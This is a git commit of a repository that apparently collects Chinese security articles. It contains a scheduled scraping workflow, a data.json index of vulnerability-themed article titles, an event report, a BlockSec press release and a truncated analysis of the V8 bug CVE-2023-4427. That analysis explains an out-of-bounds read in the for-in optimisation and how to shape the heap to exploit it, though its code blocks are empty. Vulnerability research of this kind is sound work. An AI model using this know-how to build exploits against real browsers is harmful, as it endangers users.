This commit is contained in:
test 2024-11-16 20:27:20 +08:00
parent aa1fbadb81
commit b722c3f135
36 changed files with 3881 additions and 0 deletions

39
.github/workflows/update.yml vendored Normal file
View File

@ -0,0 +1,39 @@
# This workflow will install Python dependencies, run tests and lint with a single version of Python
# For more information see: https://docs.github.com/en/actions/automating-builds-and-tests/building-and-testing-python
name: update
on:
workflow_dispatch:
schedule:
- cron: '0 */4 * * *'
permissions:
contents: write
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Set up Python 3.10
uses: actions/setup-python@v3
with:
python-version: "3.10"
- name: Install dependencies
run: |
pip install -r requirements.txt
- name: update
env:
GH_TOKEN: ${{ secrets.GH_TOKEN }}
run: |
python run.py | tee /tmp/update.log
- name: Commit and push if changed
run: |
git config --global user.email "test"
git config --global user.name "test"
git add .
MESSAGE=$(cat /tmp/update.log)
COMMIT_MESSAGE="$MESSAGE"
git diff-index --quiet HEAD || git commit -m "$(echo -e "$COMMIT_MESSAGE")"
git push

Binary file not shown.

Binary file not shown.

37
data.json Normal file
View File

@ -0,0 +1,37 @@
{
"https://mp.weixin.qq.com/s?__biz=MzU2NDY2OTU4Nw==&mid=2247513636&idx=1&sn=66bc5f0cac446268cb859e38faa2b841": "四个关键漏洞使 HPE Aruba 设备面临 RCE 攻击",
"https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247486384&idx=1&sn=6cded6c301c425146633b7c8e92b9ae2": "用友crm客户关系管理pubdownloadfile.php接口存在任意文件读取漏洞",
"https://mp.weixin.qq.com/s?__biz=MzU0MTc2NTExNg==&mid=2247490163&idx=1&sn=0af69d90d567c84ea23336cde986f7a8": "代码审计-某产品高清智能录播系统漏洞分析附未公开POC",
"https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247494519&idx=1&sn=cd24e7e546ec5cd027e8ca018f499bf4": "漏洞挖掘之众测厂商 第三方登录RedirectUrl劫持漏洞",
"https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247488062&idx=1&sn=5e3f1e901718ee760c9271676d075758": "【漏洞预警】Apache ActiveMQ Jolokia 和 REST API 未授权访问漏洞CVE-2024-32114",
"https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458553432&idx=1&sn=93377c71147ef00b8e58571093d5ab55": "CVE-2023-4427ReduceJSLoadPropertyWithEnumeratedKey 中的越界访问",
"https://mp.weixin.qq.com/s?__biz=Mzg4OTkwMDc1Mg==&mid=2247484729&idx=1&sn=b2920455891f256e016b74122977490b": "YzmCMS pay_callback.html RCE漏洞",
"https://mp.weixin.qq.com/s?__biz=MzkwNTE4Mzc2Mg==&mid=2247485256&idx=2&sn=44579672e179f0268bd6daac499832e2": "【漏洞复现】CVE-2024-1512",
"https://mp.weixin.qq.com/s?__biz=MzkwNTE4Mzc2Mg==&mid=2247485256&idx=1&sn=5a1e8635a4c0a68a5c58662d47a08f36": "【漏洞复现】CVE-2024-1698",
"https://mp.weixin.qq.com/s?__biz=Mzg2OTYzNTExNQ==&mid=2247484965&idx=1&sn=396cceb9cd98393868c20c1876aa8957": "[漏洞复现] CVE-2024-33786 中城科信票务管理平台 任意文件上传",
"https://mp.weixin.qq.com/s?__biz=MzI2NzAwOTg4NQ==&mid=2649791059&idx=1&sn=82bf570f4c7002b524bb4eacc1f7fb0d": "俄罗斯 APT28 利用 Microsoft Outlook 漏洞攻击捷克、德国实体",
"https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247494519&idx=1&sn=cd24e7e546ec5cd027e8ca018f499bf4&chksm=e8a5e114dfd268025b28a508644eff19bd5ccf522b270bc7a6e545a340e65e4eb88e83aef43e&scene=58&subscene=0": "漏洞挖掘之众测厂商 第三方登录RedirectUrl劫持漏洞",
"https://mp.weixin.qq.com/s?__biz=MzUxMjc0MTE3Mw==&mid=2247494678&idx=1&sn=4cdffd80c296f3df40b773da5943d796": "两个Google Vertex AI平台漏洞曝光可能导致权限提升与敏感数据外泄",
"https://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247492614&idx=1&sn=40f082284e0b14fd77c82d95bbeb9185": "用友漏洞一键探测利用",
"https://mp.weixin.qq.com/s?__biz=MzkxNzY0MzE2NQ==&mid=2247483950&idx=1&sn=f1b198ac63084dea04a2ad4503124b5a": ".md",
"https://mp.weixin.qq.com/s?__biz=MzIyNjk0ODYxMA==&mid=2247487497&idx=1&sn=4a47b98c0b29cd4d3e7c4f30685e1247": "【漏洞预警】 用友BIP 数据库配置信息泄露",
"https://mp.weixin.qq.com/s?__biz=MzIyNjk0ODYxMA==&mid=2247487497&idx=2&sn=adb385b0fccd4af9d9ad9d439bce5640": "【漏洞预警】D-Link-DNS 多款产品未公开接口sc_mgr.cgi 存在远程命令执行漏洞",
"https://mp.weixin.qq.com/s?__biz=MzIyNjk0ODYxMA==&mid=2247487497&idx=3&sn=1cdbe6f7a8137e5e2626d4e358c1ef93": "【漏洞预警】 易宝OA-GetProductInv SQL注入漏洞",
"https://mp.weixin.qq.com/s?__biz=MzIyNjk0ODYxMA==&mid=2247487497&idx=4&sn=e2d16220eb00621420899460b1a95941": "【漏洞预警】易思智能物流无人值守系统SQL注入",
"https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247496792&idx=1&sn=561979247dfc36401fe9815413c3f88a": "CVE-2024-25600WordPress Bricks Builder RCE",
"https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652065974&idx=1&sn=d6789e893634a0f2fb9c34b2bfb0a8f9": "【安全圈】打补丁要快0Day漏洞正在被黑客广泛利用",
"https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664229682&idx=1&sn=06d6932fae0b8e2e54feda32c9c169ab": "2024年网络安全漏洞研究人才培养交流活动成功举办",
"https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664229682&idx=4&sn=4f4906e3ee86b96a4d323bf891efdae0": "CNNVD 关于微软多个安全漏洞的通报",
"https://mp.weixin.qq.com/s?__biz=MzU0NDI5NTY4OQ==&mid=2247486145&idx=1&sn=06229e2205d5dd9e99716999b4f1aa2e": "LLM大模型安全4- 供应链漏洞",
"https://mp.weixin.qq.com/s?__biz=MzkyMzI2NzIyMw==&mid=2247488304&idx=1&sn=c0db143fcd6865fdd3482b955dd94abd": "BlockSec和OKX Explorer达成合作携手提升链上数据安全与合规等级",
"https://mp.weixin.qq.com/s?__biz=MzI0NjE1NDYyOA==&mid=2247484677&idx=1&sn=bb89036b82c59a0e1e8b06227a9e9768": "【漏洞分享】edu通杀 新中小学智慧校园信息管理系统 Upload 任意文件上传",
"https://mp.weixin.qq.com/s?__biz=MzkzNjYwODg3Ng==&mid=2247485712&idx=1&sn=e15d7dda1a02527db2c340f56df4f3ea": "【漏洞复现】某平台-testdb-info-leak信息泄露漏洞",
"https://mp.weixin.qq.com/s?__biz=MjM5Njc3NjM4MA==&mid=2651133388&idx=2&sn=8fe7297f29148fa035db128b29e8dc99": "远程代码执行风险威胁用户安全Zoom紧急修复多个安全漏洞颠覆传统安全架构Zscaler创新发布新型零信任分段方案 牛览",
"https://mp.weixin.qq.com/s?__biz=MjM5Njc3NjM4MA==&mid=2651133388&idx=2&sn=8fe7297f29148fa035db128b29e8dc99&chksm=bd15a51f8a622c096ef4441d0b5acb3ee39ef865e5650f4df483a8648b528a3509fe57972cd1&scene=58&subscene=0": "远程代码执行风险威胁用户安全Zoom紧急修复多个安全漏洞颠覆传统安全架构Zscaler创新发布新型零信任分段方案 牛览",
"https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247502432&idx=1&sn=d3405bf69adda60e3be13962d038b6aa&chksm=fe79eef8c90e67eead814333282edff4d7e247d6ba9e9ba1895fff6354e808e4fa84048a0cd1&scene=58&subscene=0": "【已复现】Fortinet FortiManager 身份认证绕过漏洞(CVE-2024-47575)安全风险通告第二次更新",
"https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664229682&idx=1&sn=06d6932fae0b8e2e54feda32c9c169ab&chksm=8b59e9cbbc2e60dd8d6dc37797f6608494298f22b5250c7326cf864063e039f776f4d7dc0847&scene=58&subscene=0": "2024年网络安全漏洞研究人才培养交流活动成功举办",
"https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664229682&idx=4&sn=4f4906e3ee86b96a4d323bf891efdae0&chksm=8b59e9cbbc2e60dda8a2633578ff2e76d88a3a00e52dba1a54ee0b2b9f554066431871d24cd8&scene=58&subscene=0": "CNNVD 关于微软多个安全漏洞的通报",
"https://mp.weixin.qq.com/s?__biz=Mzg4NTY0MDg1Mg==&mid=2247485595&idx=1&sn=b4c87d04e1659f11fad8f2f125985751&chksm=cfa49360f8d31a76e5d3880e51cd8f9b0ab1df47e86729adf04ea6d1f1202fac72fae5903fbe&scene=58&subscene=0": "大语言语言模型安全攻击以及AI供应链漏洞",
"https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247521498&idx=1&sn=f0af27f6b0e814c92846ea129bcee155&chksm=ea94a5b0dde32ca62dddf91f42a9fa2b36402ffb856469973f83a6a88e24d6910dcc53072ef4&scene=58&subscene=0": "PostgreSQL 高危漏洞可导致环境变量被利用",
"https://mp.weixin.qq.com/s?__biz=MzIwNDA2NDk5OQ==&mid=2651388483&idx=1&sn=070fb6976ee52108d263858115ea9bfd&chksm=8d398bcbba4e02ddbe0183f79c2682bbf1cab54e4ba6bb0697fdc56e297e7303aa9eb938b9e6&scene=58&subscene=0": "2024年网络安全漏洞研究人才培养交流活动成功举办"
}

3
doc/.md Normal file
View File

@ -0,0 +1,3 @@
#

View File

@ -0,0 +1,76 @@
# 2024年网络安全漏洞研究人才培养交流活动成功举办
长亭科技 2024-11-15 14:00
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/Fuleibl6qMur395GpCaf3IBV6NFLYbicEFEWodwFgn1G8qz6KcsRVJwvfxZAWFbXwbNoI4AxUTVCkzPxHIfjqpicw/640?from=appmsg "")
2024年11月14日由中国信息安全测评中心主办中国信息产业商会信息安全产业分会承办的“网络安全漏洞研究人才培养交流活动”在北京国家会议中心成功举办。来自国家关键基础设施单位、社会漏洞联盟、安全企业、测评机构、高等院校等业界专家、学者、企业代表参会。
**长亭科技为活动的成功举办提供了重要支持。**
中国信息安全测评中心彭涛主任出席活动并致辞。彭主任深入分析了在当前网络安全形势下漏洞人才培养的重要意义,就进一步强化漏洞人才培养工作从广泛汇聚人才、鼓励引导人才、用足用好人才等三个方面提出了倡议。
![](https://mmbiz.qpic.cn/mmbiz_jpg/g1thw9GoocdRIvDiagj4T5ibXydbaBUcaPVsEhHRD6p18aYxP55CIZKE78Xx8QkeFhRnxof7iaEc6rbSGqI08hs3Q/640?wx_fmt=jpeg&from=appmsg "")
**彭涛主任  致辞**
在交流环节,各位专家围绕漏洞研究人才的发现、招募、培养及奖励机制等方面展开讨论,进行了精彩的分享。
**中国移动集团高级专家徐一**
****
分享了“中国移动网信安全专业人才培养实践”,以“培养网信安全专业人才”为核心,介绍了中国移动人才培养的总体思路、举措和成果,同时针对人才培养工作提出进一步的思考和建议。
**徐一**
**教育部高等学校网络安全教学指导委员会秘书长封化民**
****
分享了“创新网安人才培养模式,加强实战型人才培育”的经验,介绍了当前网络安全人才培养面临的挑战,并提出加强实战型人才培养的行动举措。
**封化民**
**武汉大学网安学院博士后赵易如**
****
分享了“武汉大学CTF建设与漏洞人才培养”的经验对当前漏洞专业人才培养现状进行了难点分析介绍了武汉大学采取的专家认同、政策保障、组织保障、竞赛与培训体系保障等措施以及加强CTF建设和漏洞人才培养的实践经验。****
**赵易如**
**深圳市安络科技有限公司董事长、国家信息安全漏洞库漏洞技术研究联盟理事长谢朝霞**
****
分享了“青马红客训练营”、“国家信息安全漏洞库漏洞技术研究联盟”的实践经验,强调了“漏洞人才培养必须以发展为中心,以打胜仗为目的,以事业成就为彼岸”。****
**谢朝霞**
**北京长亭科技有限公司联合创始人、首席安全研究员杨坤**
****
分享了“网络攻防人才培养实践”,介绍了长亭科技在攻防人才培养方面的思路体系、工作方法和实践成果。****
****
**杨坤**
**上海斗象信息科技有限公司副总裁、漏洞盒子平台总经理曾裕智**
****
分享了“漏洞盒子白帽人才运营及创新实践”,介绍了白帽实战人才运营体系及人才选拔、培养、评价及智能派单等创新应用实践。****
****
**曾裕智**
**北京天融信网络安全股份有限公司总监毛丽艳**
****
分享了“漏洞研究与人才培养实践”介绍了天融信在漏洞挖掘、技术研究、CISP人才培养三方面的实践和成果。
****
**毛丽艳**
****
**中国信息安全测评中心华中测评中心总工王作为**
****
分享了“攻防人才培养的难点和对策”,介绍了攻防人才培养现状与难点,并从供需两侧提出了针对性的解决策略。
![](https://mmbiz.qpic.cn/mmbiz_jpg/g1thw9GoocdRIvDiagj4T5ibXydbaBUcaP20yHV48Tklp7ws4IF5BQHK8yg4QXYrJQP1zicm8d4tmky8l2fuT3RIw/640?wx_fmt=jpeg&from=appmsg "")
**王作为**
“育才造士,为国之本。”本次交流活动不仅搭建了一个各领域在网络安全漏洞人才培养的交流平台,更为新时代进一步加强漏洞人才体系建设提供了新的思路。中国信息安全测评中心将继续发挥桥梁与纽带作用,不断深化产学研用协同合作,积极筑牢我国网络空间安全人才的坚实基础,为网络强国建设做出新的更大的贡献!
![](https://mmbiz.qpic.cn/mmbiz_gif/Fuleibl6qMuosiaauWPR736pkDQtcCa6DZX0KWG2ibASddS1nKTLu9rahiashCcyfw91QyV1WXRGRnXVg79WF6YKsA/640?wx_fmt=gif "")

View File

@ -0,0 +1,72 @@
# BlockSec和OKX Explorer达成合作携手提升链上数据安全与合规等级
原创 BlockSec BlockSec 2024-11-15 17:58
![](https://mmbiz.qpic.cn/mmbiz_jpg/icl4OTbk4icTJEbsOy0EhiahVYCHkRN5Ly1FViaMZqbPeCJXHeUI3Ice0DoMKssD0p2F7ibd4YQQIYpdhic6t7t8ncOA/640?wx_fmt=jpeg "")
**我们非常开心地宣布BlockSec与OKX Explorer达成全方位战略合作**
此次合作将聚焦
**区块链信息协同、产品集成以及API互通**
等方面
,双方将通过深
度整合各自的优势产品包括BlockSec旗下的资金流追踪与调查平台MetaSleuth、安全分析浏览器Phalcon Explorer以及区块链浏览器插件MetaSuites为用户提供更全面、安全的分析工具与数据服务。
企业用户可轻松访问双方平台上的数据地址标签和合规评分,充分简化尽职调查流程,并满足监管要求。
Web3
用户能够查看风险提示、交易流信息等关键数据,从而更加便捷地进行交易分析和决策。
**合作亮点**
**BlockSec Phalcon Explorer**
****
![](https://mmbiz.qpic.cn/mmbiz_png/icl4OTbk4icTJEbsOy0EhiahVYCHkRN5Ly15tyS4UgFodumFRlmK3iahE3M5G8Y2xZtbWicDNZy7t7NVDSl34uyMzYQ/640?wx_fmt=png&from=appmsg "")
https://blocksec.com/explorer
Phalcon Explorer是一款为 DeFi 社区设计的强大交易浏览器。它提供有关调用流、余额变化和交易资金流的全面数据,同时还支持交易模拟,从而帮助开发者、安全研究人员和交易者更直观地理解交易。此次通过整合,用户可以轻松在两个浏览器的快捷入口进行跳转,检索更多信息,提升体验深度。
**BlockSec MetaSleuth**
![](https://mmbiz.qpic.cn/mmbiz_png/icl4OTbk4icTJEbsOy0EhiahVYCHkRN5Ly1sOGVWafd7aWXanRg6caXFuNRHIxvY3xMQkicULuticQ46cuKl7coQn6A/640?wx_fmt=png&from=appmsg "")
****
https://metasleuth.io/
MetaSleuth是一个加密货币追踪和调查平台。它提供了多样化功能如资金追踪、可视化资金流动、实时交易监控以及保存和分享分析结果的能力极大程度简化了用户在复杂的DeFi交易中追踪资金的过程使全流程变得更加高效。
通过本次合作,
MetaSleuth不仅支持用户直接跳转至OKX Explorer进行交易追踪还通过API互通使得用户可以
在两大平台上访问更全面的地址标签和合规评分,简化尽职调查并满足监管要求。
**BlockSec MetaSuites**
![](https://mmbiz.qpic.cn/mmbiz_png/icl4OTbk4icTJEbsOy0EhiahVYCHkRN5Ly1ft657H9Zf2ZwNq0U5fKia7cuia0zlPHQssZFu6GQHiaudWOibz67bWa69Q/640?wx_fmt=png&from=appmsg "")
https://blocksec.com/metasuites
MetaSuites是一款免费、开源、无广的区块链浏览器插件能够显著增强用户的区块链交易分析体验。目前MetaSuites 集成了20 多款Web3常用工具支持 AI 驱动的交易解读,免费为用户提供 3 亿多地址标签,更能展示直观的资金流向图。
通过本次合作用户可以直接在OKX Explorer上查看风险提示、交易流信息等关键数据从而更加便捷地进行交易分析和决策。
BlockSec致力于构建一个更加透明、安全、高效的区块链生态系统让用户在享受便捷服务的同时也能获得最前沿的安全保障。
随着与OKX Explorer的紧密合作我们承诺将带来卓越的安全服务和交易体验。
后续我们还将发布详细的用户使用说明,敬请期待!
****
**关于BlockSec**
BlockSec是全球领先的区块链安全公司于2021年由多位安全行业的知名专家联合创立。
公司致力于为Web3世界提升安全性和易用性以推进Web3的大规模采用。为此BlockSec提供智能合约和EVM链的安全审计服务面向项目方的安全开发、测试及黑客拦截系统Phalcon资金追踪调查平台MetaSleuth以及web3 builder的效率插件
MetaSuites
等。
目前公司已服务超300家客户包括MetaMask、Compound、Uniswap Foundation、Forta、PancakeSwap等知名项目方并获得来自绿洲资本、经纬创投、分布式资本等多家投资机构共计逾千万美元的两轮融资。
官网https://blocksec.com/
Twitterhttps://twitter.com/BlockSecTeam

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,525 @@
# CVE-2023-4427ReduceJSLoadPropertyWithEnumeratedKey 中的越界访问
XiaozaYa 看雪学苑 2024-05-05 17:59
```
```
##
之前分析调试漏洞时几乎都是对着别人的poc/exp
调试感觉对自己的提升不是很大所以后面分析漏洞时尽可能全面分析从漏洞产生原理、如何稳定触发进行探索并尝试自己写poc/exp。
```
```
```
```
diff.patch
如下:
```
```
#
#
```
```
#
最初接触enum cache
是在V8
的官方博客
Fast for-in in V8https://v8.dev/blog/fast-for-in
其介绍了V8
是如何实现快速的for-in
语句的,详细的内容可以参考上述官方博客。
总的来说for-in
语句用于遍历对象的可枚举属性包括原型链在V8
中其设计大概如下:
```
```
可以看到其首要的工作就是迭代遍历对象及原型链上的可枚举属性从而收集所有的可枚举keys
。那么V8
为了优化这一过程配合V8
的隐藏类机制提出了enum cache
。我们知道V8
通过隐藏类或所谓的Map
来跟踪对象的结构。具有相同Map
的对象具有相同的结构。此外每个Map
都有一个共享数据结构——描述符数组其中包含有关每个属性的详细信息例如属性存储在对象上的位置属性名称以及是否可枚举等属性信息。为了避免反复的访问描述符数组和检测相关属性V8
将可枚举对象内属性和快属性的key
和位置index
保存在了enum cache
![](https://mmbiz.qpic.cn/sz_mmbiz_png/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHcfKAwQoC1RtlSO25Pz039OVzZB0Bweus5rOozZ7z9P28HIejibpPxIQ/640?wx_fmt=png&from=appmsg "")
> 注enum cache
保存在描述符数组中而字典模式是不具有描述符数组的而对于具有描述符数组的element
其也默认就是可枚举的而对于elements
的键查找是非常简单的。所以这里enum cache
主要就是针对快属性和对象内属性的所以如果对象只要快属性或对象内属性那么在执行for-in
只需要访问一次描述符数组从描述符数组中拿到enum cache
即可找到所有的可枚举属性然后遍历原型链取原型链的enum cache
如果有的话。当然如果对象中还有elements
这时也会取enum cache
,但是会进行一些其它的操作,大致流程如下:
```
```
#
#
#
```
```
# 对于for-in语句V8会将其转换成一个循环其主要使用 3 个关键的操作ForInEnumerate、ForInPrepare、ForInNext其中ForInEnumerate/ForInPrepare主要就是收集对象所有的可枚举属性然后ForInNext用来遍历这些收集的可枚举属性对于对象属性的访问会调用JSLoadProperty
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHcqW6mOMEnmLMa2B33Cyclh1arW9TbANKJs11wFWy1AItMu6ufQKuxw/640?wx_fmt=jpeg&from=appmsg "")
而如果对象存在enum_cache
则在InliningPhase
阶段会对JSLoadProperty
进行优化:![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHKu2TnYznxNIdiaJTAXhorFg4TkiaPdsiaduO7FvhvMyX5ozWdkLBJkYVQ/640?wx_fmt=jpeg&from=appmsg "")
在InliningPhase
存在一个native_context_specialization
裁剪器:
```
```
该裁剪器会对一些JS
原生操作进行优化:
```
```
可以看到这里会调用ReduceJSLoadProperty
对JSLoadProperty
节点进行优化:
```
```
对于for-in
中的属性加载会调用ReduceJSLoadPropertyWithEnumeratedKey
进行优化:
> 这里建议读者自己好好看下这个函数中本身的注释,其写的很清楚。
```
```
总的来说对于将for-in
中的快属性访问会将JSLoadProperty
节点优化成obj map check
+LoadFieldByIndex
节点。
接下来我们去看下经过trubofan
优化后的代码的具体执行逻辑。
获取map
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHLGNLoAkbwDP9LkmxaM841P6CrwNoXdwV5MS86d0gZlV1j98icCibRW8Q/640?wx_fmt=jpeg&from=appmsg "")
执行完Builtins_ForInEnumerate
返回值rax
就是map
的值:
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHiblNBTRcpnmpswOWAdPhAHYyyYYE7sRPMUB4vc81CPm8GOrl92KESicA/640?wx_fmt=jpeg&from=appmsg "")
获取描述符数组:
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqH0PrwicqZhsy78RQw0bBbnNJFbx7ricQkLa8acpNar0Xt90z8Ba7zNjRA/640?wx_fmt=jpeg&from=appmsg "")
获取EnumCache
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqH9kYzJBUIayUosLk5HgWwoibncPqKTQMaPYbibdwQHCePApnONViciczf9A/640?wx_fmt=jpeg&from=appmsg "")
获取EnumCache.keys
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHBKeGyqBnqqCzDthYUenfHbVZ44I1sibiblzPVmGjuIAO6CjTEibnrPVwg/640?wx_fmt=jpeg&from=appmsg "")
获取map.enum_length
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHf3KzcKAAHfG7wMf3RJYN3AoM9zTrrGbL6oJ4VsHicTOu2GnPb7AWTDw/640?wx_fmt=jpeg&from=appmsg "")
将enum_length
、enum_cache
、map
保存在栈上:
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHE6HcVnvK625aAxe6WPyY574AMdnZjx4Bkibdgha8bF9NlCtRLnMfCPA/640?wx_fmt=jpeg&from=appmsg "")
每次执行完callback
都会检测obj2
的map
是否被改变如果被改变则直接去优化否则通过保存在栈上的map
获取描述符数组从而获取enum_cache
进而获取enum_cache.indices
这里会检测enum_cache.indices
是否为空,如果为空则直接去优化。
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHZXiaB7wchF3CiavFFCtYHpxzVH32LL5bys9vgtEQxx3O9B2Hwq0Xg6Aw/640?wx_fmt=jpeg&from=appmsg "")
但是这里的enum_length
并没有更新,使用的还是之前保存在栈上的值:
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqH4BekWEgSsUCzobJQAzLSoq6lMd031QXXpIo5IcsGsEuGOso4EG3eLA/640?wx_fmt=jpeg&from=appmsg "")
> 这里debug
版本有检测所以没办法展示而release
版本又用不了job
命令有点难调试所以这里得两个对着调说实话挺麻烦的这里其实可以直接在release
中设置一下的)
poc
如下:
```
```
调试可以看到在执行完callback
map->descriptor_array->enum_cache
已经被修改其中enum_cache.keys/indices
数组的大小都为 1这里存在指针压缩所以要右移一位但是这里栈中保存的enum_length
却还是 2。
> 这里是真不知道map
上的enum length
的偏移是多少
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHtzuD0EUYQvXS5Tv7f2fsUiauljnOyemFa6zp7NcaFHrMGhBt12icRQAw/640?wx_fmt=jpeg&from=appmsg "")
POC
输出如下:
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHH5o4mIXaKNFqRiaceCibnuK4Srx9AWEic617dsasPCSiacrCzWQseQ3OWQ/640?wx_fmt=jpeg&from=appmsg "")
可以看到这里明显存在问题,本来应该输出 2但是最后却输出为 0这里简单调试一下。
在经过callback
obj2
的enum_cache.indices
数组如下:
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqH2ibJEnFUXBBorHCKYnaenNSyniagqkGoVXr554GGHR2LLRtWSOeics5Ag/640?wx_fmt=jpeg&from=appmsg "")
上面说了这里的使用的enum_length
仍然是栈上保存的 2所以这里会执行第二次遍历
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHIADyF2Z8DbLwgOkhfRpUrFUc1eE1PZ5BUGuiajn7eeZkiaVq2N5TCkbg/640?wx_fmt=jpeg&from=appmsg "")
这时取出的indice
为0x6a5
跟上面是吻合的然后这里存在指针压缩所以还要经过右移处理这里的r8
指向的是对象起始地址r8+0xb
是对象内属性存储的起始位置r12
是经过右移后的indice
> 这里按理说应该是[r8 + r12*4 + 0xb]
但是调试发现该POC
就是走的这条路径......
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHDq3d5jPtruRU7LaeaYKkC7pEILhdAUFuuMbeA85ia6EMqEnrSyt6byw/640?wx_fmt=jpeg&from=appmsg "")
这里可以看下[r8 + r12*2 + 0xb]
处的值:
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqH5R6Ff7pZZZg4xWsUslTDQVkicgpEVr8aia0hu4hs7ngvulRet2jJAo9Q/640?wx_fmt=jpeg&from=appmsg "")
可以看到其值为 0我们尝试修改一下值为 0xdea4
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHkLtJxVYHnquh2A0zrPmiaQoDA4KJTtvicHhNv0FRhjiahK3AaHxaVpqOg/640?wx_fmt=jpeg&from=appmsg "")
最后输出如下:
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHflJXFwJP7PdhBoFKkBrqWGx7mzbNyk2Xzf3wxPAF0GwSSQ97UzRibCg/640?wx_fmt=jpeg&from=appmsg "")
根据输出可以知道,我们之前的分析是对的(这里存在指针压缩,所以要右移一位,说了很多次了,后面就不多说了)
#
```
```
#
根据上面的漏洞分析我们可以知道其存在一个似乎不可控的越界读的漏洞。为啥说似乎不可控呢通过上面的分析我们可以知道这里越界读是由indice
决定的在上面的例子中就是enum_cache.indices[1]
所以如果想实现精确的越界读则需要控制enum_cache.indices[1]
。所以接下来我们得去研究下enum_cache
的内存布局。
调试代码如下:
```
```
这里主要关注obj2
的enum_cache
(其实都一样,毕竟是共享的),其布局如下:
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHkmhRel5eZldbRnmulmlnOia7qSSBXK7pZLovMoTayNZYZASbmJIJe2A/640?wx_fmt=jpeg&from=appmsg "")
可以看到这里enum_cache
是在old_space
分配的,从源码中也可以得知:
```
```
所以如果我们可以找到一些对象其部分内容可控并且也使用AllocationType::kOld
进行分配其就会紧跟在enum_cache
后面分配这时我们调整obj2
的初始大小即可实现精确越界读。所以问题转换到了如何在old space
上分配内容可控对象。
笔者做了如下尝试:
◆最开始本想利用gc
来实现但是其也是不可控的因为你不能保障对象晋升时目标对象总是与indices
有固定偏移测试可以知道几乎不固定并且gc
会打乱之前的堆布局,主要是其它对象可能跑前面去了);
◆然后笔者想着直接利用enum_cache.keys/indices
的length
字段去进行控制不就完了,但是测试发现在笔者机器上,当属性个数超出 0x13 时就会切换成字典模式字典模式是不存在enum_cache
的(毕竟描述符数组都没了);
◆最后笔者尝试在V8
源码中全局搜索AllocationType::kOld
,看看哪些代码逻辑会利用其进行堆分配,但是也没有找到合适的对象。
所以为什么我是菜鸡因为我只会看官方WP
官方提供了一个POC
其中提供一个函数可以在紧接着indices
后面分配内容。
> 其实我发现了字符串是直接分配在old_space
上的但是其始终在indices
的上方,不知道为啥
但是我思考了一下其实我们没必要实现精确控制根据V8
指针压缩堆分配特性obj2
的enum_cache
的map
偏移始终是0x6a5
。然后由于只有一个越界读所以这里直接用固定的map
去尝试所以exp
不具备通用性。
> 这里固定的map
其实就是上面说的指针压缩堆分配特性,但是非常不稳定
所以我们尝试写针对特定版本的利用,这里感觉不太好说,所以直接画了一张图:![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHFmIGKBf0H8Ke9EuoYDXBYQZAAkbz6fCKPvJ2aZGmiaG9ee9Aic6dh3JA/640?wx_fmt=jpeg&from=appmsg "")
**理论上**victim_array
的addr/map/element
